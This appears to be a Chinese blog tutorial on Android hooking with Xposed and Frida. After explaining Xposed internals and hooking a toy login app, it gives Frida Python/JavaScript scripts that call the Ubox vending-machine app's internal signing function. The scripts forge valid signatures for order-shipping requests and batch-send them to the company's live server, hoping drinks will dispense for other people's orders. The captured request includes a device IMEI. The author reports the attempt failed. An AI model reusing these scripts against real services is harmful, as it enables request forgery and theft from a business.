android append方法,浅谈android hook技术

Xposed在开机的时候完成对所有的Hook Function的劫持，在原Function执行的前后加上自定义代码，很多人将这个框架用在对android的私有化定制上面，其实在android安全测试方面这个框架提供了很大的便利，xposed主要是对方法的hook，在以往的重打包技术中，需要对smali代码的进行修改，修改起来比较麻烦。

利用xposed框架可以很容易的获取到android应用中的信息，比如加密私钥、salt值等等，不需要反编译获取密钥转换算法、不需要了解密钥保存机制，直接hook函数，获取输入输出就可以。

原理

在Android系统中，应用程序进程都是由Zygote进程孵化出来的，而Zygote进程是由Init进程启动的。Zygote进程在启动时会创建一个Dalvik虚拟机实例，每当它孵化一个新的应用程序进程时，都会将这个Dalvik虚拟机实例复制到新的应用程序进程里面去，从而使得每一个应用程序进程都有一个独立的Dalvik虚拟机实例。这也是Xposed选择替换app_process的原因。

Zygote进程在启动的过程中，除了会创建一个Dalvik虚拟机实例之外，还会将Java运行时库加载到进程中来，以及注册一些Android核心类的JNI方法来前面创建的Dalvik虚拟机实例中去。注意，一个应用程序进程被Zygote进程孵化出来的时候，不仅会获得Zygote进程中的Dalvik虚拟机实例拷贝，还会与Zygote一起共享Java运行时库。这也就是可以将XposedBridge这个jar包加载到每一个Android应用程序中的原因。XposedBridge有一个私有的Native(JNI)方法hookMethodNative，这个方法也在app_process中使用。这个函数提供一个方法对象利用Java的Reflection机制来对内置方法覆写。有能力的可以针对xposed的源码进行分析，不得不说，作者对于android的机制和java的了解已经相当深入了。

简单实例

很简单的一个android登入代码：

public class MainActivity extends AppCompatActivity {private TextView accountView;

private TextView passwdView;

private Button loginBut;

private Button quitBut;

@Override

protected void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

accountView = (TextView) findViewById(R.id.account);

passwdView = (TextView) findViewById(R.id.pwd);

loginBut = (Button) findViewById(R.id.login);

quitBut = (Button) findViewById(R.id.quit);

loginBut.setOnClickListener(new View.OnClickListener() {

@Override

public void onClick(View v) {

String username = accountView.getText() + "";

String password = passwdView.getText() + "";

if(isCorrectInfo(username,password)){

Toast.makeText(MainActivity.this,"登入成功",Toast.LENGTH_LONG).show();

}

else{

Toast.makeText(MainActivity.this,"登入失败",Toast.LENGTH_LONG).show();

}

}

});

}

public boolean isCorrectInfo(String username, String password) {

if(username.equals("admin") && password.equals("passwd")){

return true;

}

else{

return false;

}

}

}

很简单的就是判断下用户输入的用户名和密码是正确，这里做个简单的演示，将用户输入的用户名和密码信息hook出来不管正确与否

简单说下xposed模块的开发，首先需要的是导入api，具体的可以参考：h t t p s :/ / g i t h u b .c o m / r o vo 8 9 / X p o s ed B r i d ge / w i k i/ U s i n g - t h e- X p o s e d - F ra m e w o r k -A P I

在manifest中定义-- coding:utf-8 --

import frida, sys #引入frida类

import logging

logging.basicConfig(filename=’test.log’, level=logging.INFO)

reload(sys)

sys.setdefaultencoding(‘utf-8’) #对输出进行utf8的编码

print sys.getdefaultencoding()

def print_result(message): #对输出的信息进行打印

print message

logging.info(message)

def on_message(message, data): # 反调函数，用来接受message的信息，message后面会说到

try:

print_result(message=message)

except:

pass

did = “255601452” # 订单id

time = “1472706588” # 时间戳

jscode = “”” # 核心代码，这段主要是调用app中的相应处理函数，后面会分析这段代码的来源

Dalvik.perform(function () { # 说明是Dalvik平台

var currentApplication = Dalvik.use(“android.app.ActivityThread”).currentApplication();

var context = currentApplication.getApplicationContext();

var signclass = Dalvik.use(“com.ub.main.d.e”);# 调用com.ub.main.d.e类

var signInstance=signclass.$new(context); # 反射创建一个新的对象

var sign=signInstance.a(“255601452”); #调用对象的a函数

send(sign); #将调用函数的结果发送出来

});

“”“print jscode

process = frida.get_device_manager().enumerate_devices()[-1].attach(“com.ub.main”) # 获取连接的设备并枚举取最后一个设备连接，并附到com.ub.main的进程上面

print process

script = process.create_script(jscode) # 调用相应的js函数，获取函数调用后的结果值

script.on(‘message’, on_message) # 利用回调，将message传递给on_message函数

print “done”

script.load()

反编译获取app中的核心函数

对于上面的js代码，其实就是调用app中的某个函数，比如sign值生成函数，加密解密函数，不需要自己单独的去分析算法流程，分析key值在哪，直接调用app的相应函数，让app帮我们完成这些工作

这里我们分析的app是友宝，这是一款饮料售货机，当时抓包看到提货的时候是只有个订单id的，猜想是不是遍历订单的id，支付成功但是没有取货的订单会不会响应请求，自己掉货出来

下面对友宝的订单进行分析过程

1、抓取支付订单成功链接

http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=32020&wake_id=0&net_type=1&carrier_type=1&s=4 postdata：sign=et09HgkvWcNc%252FTLe3E7Qj4j6MZEPbnm2zbCzJ3esTi0n6qo6T2RE6Qggh3rYytoTbKHGC1O3ghNPPZqoXSF%252FlzsRK2BnkLouKdZ%252BLnyZgdGrYgOyRv2piGOHnUwAhz5%252BUOWbH5ljMvNBgvTJwWsTy200bW2FAA%252BRkqNCn%252F4qIvo%253D&orderId=255601452×tamp=1472706588

分析：sign是校验值，主要是防止订单伪造的，orderid是产生的支付订单id，这个主要是防止伪造用

2、反编译友宝app

找到morder/shipping所在的包为：com/ub/main/d/e.class

其中localStringBuffer存储的就是url中的参数信息，该请求查找到的代码在a()

StringBuffer localStringBuffer = new StringBuffer();

localStringBuffer.append(“clientversion”);

localStringBuffer.append(“=”);

try

{

localStringBuffer.append(Uri.encode(this.e.getPackageManager().getPackageInfo(this.e.getPackageName(), 0).versionName));

localStringBuffer.append(“&”);

localStringBuffer.append(“machine_type”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(Build.MODEL));

localStringBuffer.append(“&”);

localStringBuffer.append(“os”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(Build.VERSION.RELEASE));

localStringBuffer.append(“&”);

localStringBuffer.append(“channel_id”);

localStringBuffer.append(“=”);

localStringBuffer.append(this.g.u());

localStringBuffer.append(“&”);

localStringBuffer.append(“device_no”);

localStringBuffer.append(“=”);

Object localObject1 = “”;

try

{

String str5 = Uri.encode(i.a(this.e));

localObject1 = str5;

}

catch (Exception localException1)

{

Object localObject2;

for (;;) {}

}

localStringBuffer.append((String)localObject1);

localStringBuffer.append(“&”);

localStringBuffer.append(“imei”);

localStringBuffer.append(“=”);

localObject2 = “”;

try

{

String str4 = Uri.encode(i.b(this.e));

localObject2 = str4;

}

catch (Exception localException2)

{

boolean bool;

String str1;

String str2;

String str3;

for (;;) {}

}

localStringBuffer.append((String)localObject2);

localStringBuffer.append(“&”);

localStringBuffer.append(“device_id”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(“2”));

localStringBuffer.append(“&”);

localStringBuffer.append(“u”);

localStringBuffer.append(“=”);

localStringBuffer.append(Uri.encode(this.f.c()));

localStringBuffer.append(“&”);

localStringBuffer.append(“wake_id”);

localStringBuffer.append(“=”);

localStringBuffer.append(“0”);

localStringBuffer.append(“&”);

localStringBuffer.append(“net_type”);

localStringBuffer.append(“=”);

localStringBuffer.append(i.g(this.e));

localStringBuffer.append(“&”);

localStringBuffer.append(“carrier_type”);

localStringBuffer.append(“=”);

localStringBuffer.append(i.h(this.e));

bool = this.f.f();

str1 = this.f.l();

str2 = this.f.m();

if (bool)

{

str3 = “4”;

l.a(“weipeipei”, “get参数—->isUboxAccount = ” + bool + “, s = ” + str3);

localStringBuffer.append(“&”);

localStringBuffer.append(“s”);

localStringBuffer.append(“=”);

localStringBuffer.append(str3);

return localStringBuffer.toString().trim();

}

}

catch (PackageManager.NameNotFoundException localNameNotFoundException)

{

for (;;)

{

localNameNotFoundException.printStackTrace();

continue;

if ((str1 != null) && (!str1.trim().equals(“”))) {

str3 = “2”;

} else if ((str2 != null) && (!str2.trim().equals(“”))) {

str3 = “3”;

} else {

str3 = “0”;

}

}

}

}

生成签名的函数在com/ub/main/d/e.class中的b函数

public String b(String[][] paramArrayOfString)

输入的是一个array

上面的请求函数在：

public String a(String paramString)

{

String[][] arrayOfString = new String[2][];

arrayOfString[0] = { “orderId”, paramString };

String[] arrayOfString1 = new String[2];

arrayOfString1[0] = “timestamp”;

arrayOfString1[1] = d;

arrayOfString[1] = arrayOfString1;

return b(arrayOfString);

}

最后加上sign值，发送请求

3、可以反编译出他的sign计算方法，也可以直接调用b函数来产生sign值，后来发现app会自动取时间戳，我们就不需要给他array型的参数，直接调用a函数，把orderId给他，让他直接return一个值出来就好了，就有了上面的js代码

4、自动化的批量处理

看代码author = ‘gaohe’-- coding:utf-8 --

import frida, sys

import logging

import requests

logging.basicConfig(filename=’test.log’, level=logging.INFO)

reload(sys)

sys.setdefaultencoding(‘utf-8’)print sys.getdefaultencoding()

class ubox:

def init(self):

passdef request(self, payload):

# print "requests"

dict = {}

url = "http://monk.uboxol.com/morder/shipping?clientversion=5.7.2&machine_type=MI+5&os=6.0.1&channel_id=1&device_no=02%3A00%3A00%3A00%3A00%3A00&imei=869161021849708&device_id=2&u=41493965&wake_id=0&net_type=1&carrier_type=1&s=4"

for i in payload.split("&"):

key = i.split("=")[0]

value = i.split("=")[1]

dict[key] = value

data=dict

r=requests.post(url=url,data=data)

print r.text

def print_result(self, message):

# print message

payload = message["payload"]

print payload

self.request(payload)

def on_message(self, message, data):

self.print_result(message=message)

def fuzzing(self, did):

jscode = """

Dalvik.perform(function () {

var currentApplication = Dalvik.use("android.app.ActivityThread").currentApplication();

var context = currentApplication.getApplicationContext();

var signclass = Dalvik.use("com.ub.main.d.e");

var signInstance=signclass.$new(context);

var sign=signInstance.a("%s");

send(sign);

});

""" % did

# print jscode

process = frida.get_device_manager().enumerate_devices()[-1].attach("com.ub.main")

# print process

script = process.create_script(jscode)

script.on('message', self.on_message)

# print "done"

script.load()

# sys.stdin.read()

ub = ubox()

ub.fuzzing(“255912964”)

构造了一个类，后面直接fuzz uid就可以了，提取里面的sign值拼接到post数据中去

可以产生的post请求和抓到的数据包的请求是完全一样的，但是并没有测试成功，分析原因有可能是订单id和用户的id有所绑定。

不过学习到了怎样通过frida对app进行分析。